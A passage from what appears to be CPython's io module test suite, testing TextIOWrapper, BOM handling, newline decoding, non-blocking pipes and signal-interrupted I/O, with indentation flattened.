# read one char at a time
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_2(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = ""
while True:
c = txt.read(4)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_3(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read(4)
reads += txt.readline()
reads += txt.readline()
reads += txt.readline()
self.assertEqual(reads, self.normalized)
def test_issue1395_4(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read()
self.assertEqual(reads, self.normalized)
def test_issue1395_5(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
pos = txt.tell()
txt.seek(0)
txt.seek(pos)
self.assertEqual(txt.read(4), "BBB\n")
def test_issue2282(self):
buffer = self.BytesIO(self.testdata)
txt = self.TextIOWrapper(buffer, encoding="ascii")
self.assertEqual(buffer.seekable(), txt.seekable())
def test_append_bom(self):
# The BOM is not written again when appending to a non-empty file
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaa'.encode(charset))
with self.open(filename, 'a', encoding=charset) as f:
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_seek_bom(self):
# Same test, but when seeking manually
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'r+', encoding=charset) as f:
f.seek(pos)
f.write('zzz')
f.seek(0)
f.write('bbb')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'bbbzzz'.encode(charset))
def test_seek_append_bom(self):
# Same test, but first seek to the start and then to the end
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
with self.open(filename, 'a', encoding=charset) as f:
f.seek(0)
f.seek(0, self.SEEK_END)
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_errors_property(self):
with self.open(support.TESTFN, "w") as f:
self.assertEqual(f.errors, "strict")
with self.open(support.TESTFN, "w", errors="replace") as f:
self.assertEqual(f.errors, "replace")
@support.no_tracing
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_threads_write(self):
# Issue6750: concurrent writes could duplicate data
event = threading.Event()
with self.open(support.TESTFN, "w", buffering=1) as f:
def run(n):
text = "Thread%03d\n" % n
event.wait()
f.write(text)
threads = [threading.Thread(target=run, args=(x,))
for x in range(20)]
with support.start_threads(threads, event.set):
time.sleep(0.02)
with self.open(support.TESTFN) as f:
content = f.read()
for n in range(20):
self.assertEqual(content.count("Thread%03d\n" % n), 1)
def test_flush_error_on_close(self):
# Test that text file is closed despite failed flush
# and that flush() is called before file closed.
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
closed = []
def bad_flush():
closed[:] = [txt.closed, txt.buffer.closed]
raise OSError()
txt.flush = bad_flush
self.assertRaises(OSError, txt.close) # exception not swallowed
self.assertTrue(txt.closed)
self.assertTrue(txt.buffer.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
txt.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
txt.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(txt.closed)
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
txt.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(txt.closed)
def test_multi_close(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt.close()
txt.close()
txt.close()
self.assertRaises(ValueError, txt.flush)
def test_unseekable(self):
txt = self.TextIOWrapper(self.MockUnseekableIO(self.testdata))
self.assertRaises(self.UnsupportedOperation, txt.tell)
self.assertRaises(self.UnsupportedOperation, txt.seek, 0)
def test_readonly_attributes(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
buf = self.BytesIO(self.testdata)
with self.assertRaises(AttributeError):
txt.buffer = buf
def test_rawio(self):
# Issue #12591: TextIOWrapper must work with raw I/O objects, so
# that subprocess.Popen() can have the required unbuffered
# semantics with universal_newlines=True.
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
# Reads
self.assertEqual(txt.read(4), 'abcd')
self.assertEqual(txt.readline(), 'efghi\n')
self.assertEqual(list(txt), ['jkl\n', 'opq\n'])
def test_rawio_write_through(self):
# Issue #12591: with write_through=True, writes don't need a flush
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n',
write_through=True)
txt.write('1')
txt.write('23\n4')
txt.write('5')
self.assertEqual(b''.join(raw._write_stack), b'123\n45')
def test_bufio_write_through(self):
# Issue #21396: write_through=True doesn't force a flush()
# on the underlying binary buffered object.
flush_called, write_called = [], []
class BufferedWriter(self.BufferedWriter):
def flush(self, *args, **kwargs):
flush_called.append(True)
return super().flush(*args, **kwargs)
def write(self, *args, **kwargs):
write_called.append(True)
return super().write(*args, **kwargs)
rawio = self.BytesIO()
data = b"a"
bufio = BufferedWriter(rawio, len(data)*2)
textio = self.TextIOWrapper(bufio, encoding='ascii',
write_through=True)
# write to the buffered io but don't overflow the buffer
text = data.decode('ascii')
textio.write(text)
# buffer.flush is not called with write_through=True
self.assertFalse(flush_called)
# buffer.write *is* called with write_through=True
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), b"") # no flush
write_called = [] # reset
textio.write(text * 10) # total content is larger than bufio buffer
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), data * 11) # all flushed
def test_read_nonbytes(self):
# Issue #17106
# Crash when underlying read() returns non-bytes
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.read, 1)
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.readline)
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.read)
def test_illegal_decoder(self):
# Issue #17106
# Bypass the early encoding check added in issue 20404
def _make_illegal_wrapper():
quopri = codecs.lookup("quopri")
quopri._is_text_encoding = True
try:
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'),
newline='\n', encoding="quopri")
finally:
quopri._is_text_encoding = False
return t
# Crash when decoder returns non-string
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read, 1)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.readline)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read)
def _check_create_at_shutdown(self, **kwargs):
# Issue #20037: creating a TextIOWrapper at shutdown
# shouldn't crash the interpreter.
iomod = self.io.__name__
code = """if 1:
import codecs
import {iomod} as io
# Avoid looking up codecs at shutdown
codecs.lookup('utf-8')
class C:
def __init__(self):
self.buf = io.BytesIO()
def __del__(self):
io.TextIOWrapper(self.buf, **{kwargs})
print("ok")
c = C()
""".format(iomod=iomod, kwargs=kwargs)
return assert_python_ok("-c", code)
def test_create_at_shutdown_without_encoding(self):
rc, out, err = self._check_create_at_shutdown()
if err:
# Can error out with a RuntimeError if the module state
# isn't found.
self.assertIn(self.shutdown_error, err.decode())
else:
self.assertEqual("ok", out.decode().strip())
def test_create_at_shutdown_with_encoding(self):
rc, out, err = self._check_create_at_shutdown(encoding='utf-8',
errors='strict')
self.assertFalse(err)
self.assertEqual("ok", out.decode().strip())
def test_read_byteslike(self):
r = MemviewBytesIO(b'Just some random string\n')
t = self.TextIOWrapper(r, 'utf-8')
# TextIOwrapper will not read the full string, because
# we truncate it to a multiple of the native int size
# so that we can construct a more complex memoryview.
bytes_val = _to_memoryview(r.getvalue()).tobytes()
self.assertEqual(t.read(200), bytes_val.decode('utf-8'))
def test_issue22849(self):
class F(object):
def readable(self): return True
def writable(self): return True
def seekable(self): return True
for i in range(10):
try:
self.TextIOWrapper(F(), encoding='utf-8')
except Exception:
pass
F.tell = lambda x: 0
t = self.TextIOWrapper(F(), encoding='utf-8')
class MemviewBytesIO(io.BytesIO):
'''A BytesIO object whose read method returns memoryviews
rather than bytes'''
def read1(self, len_):
return _to_memoryview(super().read1(len_))
def read(self, len_):
return _to_memoryview(super().read(len_))
def _to_memoryview(buf):
'''Convert bytes-object *buf* to a non-trivial memoryview'''
arr = array.array('i')
idx = len(buf) - len(buf) % arr.itemsize
arr.frombytes(buf[:idx])
return memoryview(arr)
class CTextIOWrapperTest(TextIOWrapperTest):
io = io
shutdown_error = "RuntimeError: could not find io module state"
def test_initialization(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
self.assertRaises(ValueError, t.read)
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
def test_garbage_collection(self):
# C TextIOWrapper objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends in gc.garbage instead.
with support.check_warnings(('', ResourceWarning)):
rawio = io.FileIO(support.TESTFN, "wb")
b = self.BufferedWriter(rawio)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("456def")
t.x = t
wr = weakref.ref(t)
del t
support.gc_collect()
self.assertTrue(wr() is None, wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"456def")
def test_rwpair_cleared_before_textio(self):
# Issue 13070: TextIOWrapper's finalization would crash when called
# after the reference to the underlying BufferedRWPair's writer got
# cleared by the GC.
for i in range(1000):
b1 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t1 = self.TextIOWrapper(b1, encoding="ascii")
b2 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t2 = self.TextIOWrapper(b2, encoding="ascii")
# circular references
t1.buddy = t2
t2.buddy = t1
support.gc_collect()
class PyTextIOWrapperTest(TextIOWrapperTest):
io = pyio
#shutdown_error = "LookupError: unknown encoding: ascii"
shutdown_error = "TypeError: 'NoneType' object is not iterable"
class IncrementalNewlineDecoderTest(unittest.TestCase):
def check_newline_decoding_utf8(self, decoder):
# UTF-8 specific tests for a newline decoder
def _check_decode(b, s, **kwargs):
# We exercise getstate() / setstate() as well as decode()
state = decoder.getstate()
self.assertEqual(decoder.decode(b, **kwargs), s)
decoder.setstate(state)
self.assertEqual(decoder.decode(b, **kwargs), s)
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
self.assertRaises(UnicodeDecodeError, decoder.decode, b'', final=True)
decoder.reset()
_check_decode(b'\n', "\n")
_check_decode(b'\r', "")
_check_decode(b'', "\n", final=True)
_check_decode(b'\r', "\n", final=True)
_check_decode(b'\r', "")
_check_decode(b'a', "\na")
_check_decode(b'\r\r\n', "\n\n")
_check_decode(b'\r', "")
_check_decode(b'\r', "\n")
_check_decode(b'\na', "\na")
_check_decode(b'\xe8\xa2\x88\r\n', "\u8888\n")
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\n', "\n")
_check_decode(b'\xe8\xa2\x88\r', "\u8888")
_check_decode(b'\n', "\n")
def check_newline_decoding(self, decoder, encoding):
result = []
if encoding is not None:
encoder = codecs.getincrementalencoder(encoding)()
def _decode_bytewise(s):
# Decode one byte at a time
for b in encoder.encode(s):
result.append(decoder.decode(bytes([b])))
else:
encoder = None
def _decode_bytewise(s):
# Decode one char at a time
for c in s:
result.append(decoder.decode(c))
self.assertEqual(decoder.newlines, None)
_decode_bytewise("abc\n\r")
self.assertEqual(decoder.newlines, '\n')
_decode_bytewise("\nabc")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc")
self.assertEqual(decoder.newlines, ('\r', '\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual("".join(result), "abc\n\nabcabc\nabcabc")
decoder.reset()
input = "abc"
if encoder is not None:
encoder.reset()
input = encoder.encode(input)
self.assertEqual(decoder.decode(input), "abc")
self.assertEqual(decoder.newlines, None)
def test_newline_decoder(self):
encodings = (
# None meaning the IncrementalNewlineDecoder takes unicode input
# rather than bytes input
None, 'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
for enc in encodings:
decoder = enc and codecs.getincrementaldecoder(enc)()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding(decoder, enc)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding_utf8(decoder)
def test_newline_bytes(self):
# Issue 5433: Excessive optimization in IncrementalNewlineDecoder
def _check(dec):
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0D00"), "\u0D00")
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0A00"), "\u0A00")
self.assertEqual(dec.newlines, None)
dec = self.IncrementalNewlineDecoder(None, translate=False)
_check(dec)
dec = self.IncrementalNewlineDecoder(None, translate=True)
_check(dec)
class CIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
class PyIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
# XXX Tests for open()
class MiscIOTest(unittest.TestCase):
def tearDown(self):
support.unlink(support.TESTFN)
def test___all__(self):
for name in self.io.__all__:
obj = getattr(self.io, name, None)
self.assertTrue(obj is not None, name)
if name == "open":
continue
elif "error" in name.lower() or name == "UnsupportedOperation":
self.assertTrue(issubclass(obj, Exception), name)
elif not name.startswith("SEEK_"):
self.assertTrue(issubclass(obj, self.IOBase))
def test_attributes(self):
f = self.open(support.TESTFN, "wb", buffering=0)
self.assertEqual(f.mode, "wb")
f.close()
with support.check_warnings(('', DeprecationWarning)):
f = self.open(support.TESTFN, "U")
self.assertEqual(f.name, support.TESTFN)
self.assertEqual(f.buffer.name, support.TESTFN)
self.assertEqual(f.buffer.raw.name, support.TESTFN)
self.assertEqual(f.mode, "U")
self.assertEqual(f.buffer.mode, "rb")
self.assertEqual(f.buffer.raw.mode, "rb")
f.close()
f = self.open(support.TESTFN, "w+")
self.assertEqual(f.mode, "w+")
self.assertEqual(f.buffer.mode, "rb+") # Does it really matter?
self.assertEqual(f.buffer.raw.mode, "rb+")
g = self.open(f.fileno(), "wb", closefd=False)
self.assertEqual(g.mode, "wb")
self.assertEqual(g.raw.mode, "wb")
self.assertEqual(g.name, f.fileno())
self.assertEqual(g.raw.name, f.fileno())
f.close()
g.close()
def test_io_after_close(self):
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "w", "buffering": 1},
{"mode": "w", "buffering": 2},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "r", "buffering": 1},
{"mode": "r", "buffering": 2},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+", "buffering": 1},
{"mode": "w+", "buffering": 2},
{"mode": "w+b", "buffering": 0},
]:
f = self.open(support.TESTFN, **kwargs)
f.close()
self.assertRaises(ValueError, f.flush)
self.assertRaises(ValueError, f.fileno)
self.assertRaises(ValueError, f.isatty)
self.assertRaises(ValueError, f.__iter__)
if hasattr(f, "peek"):
self.assertRaises(ValueError, f.peek, 1)
self.assertRaises(ValueError, f.read)
if hasattr(f, "read1"):
self.assertRaises(ValueError, f.read1, 1024)
if hasattr(f, "readall"):
self.assertRaises(ValueError, f.readall)
if hasattr(f, "readinto"):
self.assertRaises(ValueError, f.readinto, bytearray(1024))
if hasattr(f, "readinto1"):
self.assertRaises(ValueError, f.readinto1, bytearray(1024))
self.assertRaises(ValueError, f.readline)
self.assertRaises(ValueError, f.readlines)
self.assertRaises(ValueError, f.seek, 0)
self.assertRaises(ValueError, f.tell)
self.assertRaises(ValueError, f.truncate)
self.assertRaises(ValueError, f.write,
b"" if "b" in kwargs['mode'] else "")
self.assertRaises(ValueError, f.writelines, [])
self.assertRaises(ValueError, next, f)
def test_blockingioerror(self):
# Various BlockingIOError issues
class C(str):
pass
c = C("")
b = self.BlockingIOError(1, c)
c.b = b
b.c = c
wr = weakref.ref(c)
del c, b
support.gc_collect()
self.assertTrue(wr() is None, wr)
def test_abcs(self):
# Test the visible base classes are ABCs.
self.assertIsInstance(self.IOBase, abc.ABCMeta)
self.assertIsInstance(self.RawIOBase, abc.ABCMeta)
self.assertIsInstance(self.BufferedIOBase, abc.ABCMeta)
self.assertIsInstance(self.TextIOBase, abc.ABCMeta)
def _check_abc_inheritance(self, abcmodule):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "wb") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "w") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertIsInstance(f, abcmodule.TextIOBase)
def test_abc_inheritance(self):
# Test implementations inherit from their respective ABCs
self._check_abc_inheritance(self)
def test_abc_inheritance_official(self):
# Test implementations inherit from the official ABCs of the
# baseline "io" module.
self._check_abc_inheritance(io)
def _check_warn_on_dealloc(self, *args, **kwargs):
f = open(*args, **kwargs)
r = repr(f)
with self.assertWarns(ResourceWarning) as cm:
f = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_warn_on_dealloc(self):
self._check_warn_on_dealloc(support.TESTFN, "wb", buffering=0)
self._check_warn_on_dealloc(support.TESTFN, "wb")
self._check_warn_on_dealloc(support.TESTFN, "w")
@unittest.skipUnless(hasattr(os, "pipe"), "requires os.pipe()")
def _check_warn_on_dealloc_fd(self, *args, **kwargs):
fds = []
def cleanup_fds():
for fd in fds:
try:
os.close(fd)
except OSError as e:
if e.errno != errno.EBADF:
raise
self.addCleanup(cleanup_fds)
r, w = os.pipe()
fds += r, w
self._check_warn_on_dealloc(r, *args, **kwargs)
# When using closefd=False, there's no warning
r, w = os.pipe()
fds += r, w
with warnings.catch_warnings(record=True) as recorded:
open(r, *args, closefd=False, **kwargs)
support.gc_collect()
self.assertEqual(recorded, [])
def test_warn_on_dealloc_fd(self):
self._check_warn_on_dealloc_fd("rb", buffering=0)
self._check_warn_on_dealloc_fd("rb")
self._check_warn_on_dealloc_fd("r")
def test_pickling(self):
# Pickling file objects is forbidden
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+b", "buffering": 0},
]:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
with self.open(support.TESTFN, **kwargs) as f:
self.assertRaises(TypeError, pickle.dumps, f, protocol)
def test_nonblock_pipe_write_bigbuf(self):
self._test_nonblock_pipe_write(16*1024)
def test_nonblock_pipe_write_smallbuf(self):
self._test_nonblock_pipe_write(1024)
@unittest.skipUnless(hasattr(os, 'set_blocking'),
'os.set_blocking() required for this test')
def _test_nonblock_pipe_write(self, bufsize):
sent = []
received = []
r, w = os.pipe()
os.set_blocking(r, False)
os.set_blocking(w, False)
# To exercise all code paths in the C implementation we need
# to play with buffer sizes. For instance, if we choose a
# buffer size less than or equal to _PIPE_BUF (4096 on Linux)
# then we will never get a partial write of the buffer.
rf = self.open(r, mode='rb', closefd=True, buffering=bufsize)
wf = self.open(w, mode='wb', closefd=True, buffering=bufsize)
with rf, wf:
for N in 9999, 73, 7574:
try:
i = 0
while True:
msg = bytes([i % 26 + 97]) * N
sent.append(msg)
wf.write(msg)
i += 1
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
sent[-1] = sent[-1][:e.characters_written]
received.append(rf.read())
msg = b'BLOCKED'
wf.write(msg)
sent.append(msg)
while True:
try:
wf.flush()
break
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
self.assertEqual(e.characters_written, 0)
received.append(rf.read())
received += iter(rf.read, None)
sent, received = b''.join(sent), b''.join(received)
self.assertTrue(sent == received)
self.assertTrue(wf.closed)
self.assertTrue(rf.closed)
def test_create_fail(self):
# 'x' mode fails if file is existing
with self.open(support.TESTFN, 'w'):
pass
self.assertRaises(FileExistsError, self.open, support.TESTFN, 'x')
def test_create_writes(self):
# 'x' mode opens for writing
with self.open(support.TESTFN, 'xb') as f:
f.write(b"spam")
with self.open(support.TESTFN, 'rb') as f:
self.assertEqual(b"spam", f.read())
def test_open_allargs(self):
# there used to be a buffer overflow in the parser for rawmode
self.assertRaises(ValueError, self.open, support.TESTFN, 'rwax+')
class CMiscIOTest(MiscIOTest):
io = io
def test_readinto_buffer_overflow(self):
# Issue #18025
class BadReader(self.io.BufferedIOBase):
def read(self, n=-1):
return b'x' * 10**6
bufio = BadReader()
b = bytearray(2)
self.assertRaises(ValueError, bufio.readinto, b)
@unittest.skipUnless(threading, 'Threading required for this test.')
def check_daemon_threads_shutdown_deadlock(self, stream_name):
# Issue #23309: deadlocks at shutdown should be avoided when a
# daemon thread and the main thread both write to a file.
code = """if 1:
import sys
import time
import threading
file = sys.{stream_name}
def run():
while True:
file.write('.')
file.flush()
thread = threading.Thread(target=run)
thread.daemon = True
thread.start()
time.sleep(0.5)
file.write('!')
file.flush()
""".format_map(locals())
res, _ = run_python_until_end("-c", code)
err = res.err.decode()
if res.rc != 0:
# Failure: should be a fatal error
self.assertIn("Fatal Python error: could not acquire lock "
"for <_io.BufferedWriter name='<{stream_name}>'> "
"at interpreter shutdown, possibly due to "
"daemon threads".format_map(locals()),
err)
else:
self.assertFalse(err.strip('.!'))
def test_daemon_threads_shutdown_stdout_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stdout')
def test_daemon_threads_shutdown_stderr_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stderr')
class PyMiscIOTest(MiscIOTest):
io = pyio
@unittest.skipIf(os.name == 'nt' or os.name == 'uwp_os', 'POSIX signals required for this test.')
class SignalsTest(unittest.TestCase):
def setUp(self):
self.oldalrm = signal.signal(signal.SIGALRM, self.alarm_interrupt)
def tearDown(self):
signal.signal(signal.SIGALRM, self.oldalrm)
def alarm_interrupt(self, sig, frame):
1/0
@unittest.skipUnless(threading, 'Threading required for this test.')
def check_interrupted_write(self, item, bytes, **fdopen_kwargs):
"""Check that a partial write, when it gets interrupted, properly
invokes the signal handler, and bubbles up the exception raised
in the latter."""
read_results = []
def _read():
if hasattr(signal, 'pthread_sigmask'):
signal.pthread_sigmask(signal.SIG_BLOCK, [signal.SIGALRM])
s = os.read(r, 1)
read_results.append(s)
t = threading.Thread(target=_read)
t.daemon = True
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
large_data = item * (support.PIPE_MAX_SIZE // len(item) + 1)
try:
wio = self.io.open(w, **fdopen_kwargs)
t.start()
# Fill the pipe enough that the write will be blocking.
# It will be interrupted by the timer armed above. Since the
# other thread has read one byte, the low-level write will
# return with a successful (partial) result rather than an EINTR.
# The buffered IO layer must check for pending signal
# handlers, which in this case will invoke alarm_interrupt().
signal.alarm(1)
try:
self.assertRaises(ZeroDivisionError, wio.write, large_data)
finally:
signal.alarm(0)
t.join()
# We got one byte, get another one and check that it isn't a
# repeat of the first one.
read_results.append(os.read(r, 1))
self.assertEqual(read_results, [bytes[0:1], bytes[1:2]])
finally:
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and block again.
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_unbuffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb", buffering=0)
def test_interrupted_write_buffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb")
# Issue #22331: The test hangs on FreeBSD 7.2
@support.requires_freebsd_version(8)
def test_interrupted_write_text(self):
self.check_interrupted_write("xy", b"xy", mode="w", encoding="ascii")
@support.no_tracing
def check_reentrant_write(self, data, **fdopen_kwargs):
def on_alarm(*args):
# Will be called reentrantly from the same thread
wio.write(data)
1/0
signal.signal(signal.SIGALRM, on_alarm)
r, w = os.pipe()
wio = self.io.open(w, **fdopen_kwargs)
try:
signal.alarm(1)
# Either the reentrant call to wio.write() fails with RuntimeError,
# or the signal handler raises ZeroDivisionError.
with self.assertRaises((ZeroDivisionError, RuntimeError)) as cm:
while 1:
for i in range(100):
wio.write(data)
wio.flush()
# Make sure the buffer doesn't fill up and block further writes
os.read(r, len(data) * 100)
exc = cm.exception
if isinstance(exc, RuntimeError):
self.assertTrue(str(exc).startswith("reentrant call"), str(exc))
finally:
wio.close()
os.close(r)
def test_reentrant_write_buffered(self):
self.check_reentrant_write(b"xy", mode="wb")
def test_reentrant_write_text(self):
self.check_reentrant_write("xy", mode="w", encoding="ascii")
def check_interrupted_read_retry(self, decode, **fdopen_kwargs):
"""Check that a buffered read, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
def alarm_handler(sig, frame):
os.write(w, b"bar")
signal.signal(signal.SIGALRM, alarm_handler)
try:
rio = self.io.open(r, **fdopen_kwargs)
os.write(w, b"foo")
signal.alarm(1)
# Expected behaviour:
# - first raw read() returns partial b"foo"
# - second raw read() returns EINTR
# - third raw read() returns b"bar"
self.assertEqual(decode(rio.read(6)), "foobar")
finally:
rio.close()
os.close(w)
os.close(r)
def test_interrupted_read_retry_buffered(self):
self.check_interrupted_read_retry(lambda x: x.decode('latin1'),
mode="rb")
def test_interrupted_read_retry_text(self):
self.check_interrupted_read_retry(lambda x: x,
mode="r")
@unittest.skipUnless(threading, 'Threading required for this test.')
def check_interrupted_write_retry(self, item, **fdopen_kwargs):
"""Check that a buffered write, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
select = support.import_module("select")
# A quantity that exceeds the buffer size of an anonymous pipe's
# write end.
N = support.PIPE_MAX_SIZE
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
# We need a separate thread to read from the pipe and allow the
# write() to finish. This thread is started after the SIGALRM is
# received (forcing a first EINTR in write()).
read_results = []
write_finished = False
error = None
def _read():
try:
while not write_finished:
while r in select.select([r], [], [], 1.0)[0]:
s = os.read(r, 1024)
read_results.append(s)
except BaseException as exc:
nonlocal error
error = exc
t = threading.Thread(target=_read)
t.daemon = True
def alarm1(sig, frame):
signal.signal(signal.SIGALRM, alarm2)
signal.alarm(1)
def alarm2(sig, frame):
t.start()
large_data = item * N
signal.signal(signal.SIGALRM, alarm1)
try:
wio = self.io.open(w, **fdopen_kwargs)
signal.alarm(1)
# Expected behaviour:
# - first raw write() is partial (because of the limited pipe buffer
# and the first alarm)
# - second raw write() returns EINTR (because of the second alarm)
# - subsequent write()s are successful (either partial or complete)
written = wio.write(large_data)
self.assertEqual(N, written)
wio.flush()
write_finished = True
t.join()
self.assertIsNone(error)
self.assertEqual(N, sum(len(x) for x in read_results))
finally:
write_finished = True
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and could block (in case of failure).
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_retry_buffered(self):
self.check_interrupted_write_retry(b"x", mode="wb")
def test_interrupted_write_retry_text(self):
self.check_interrupted_write_retry("x", mode="w", encoding="latin1")
class CSignalsTest(SignalsTest):
io = io
class PySignalsTest(SignalsTest):
io = pyio
# Handling reentrancy issues would slow down _pyio even more, so the
# tests are disabled.
test_reentrant_write_buffered = None
test_reentrant_write_text = None
def load_tests(*args):
tests = (CIOTest, PyIOTest, APIMismatchTest,
CBufferedReaderTest, PyBufferedReaderTest,
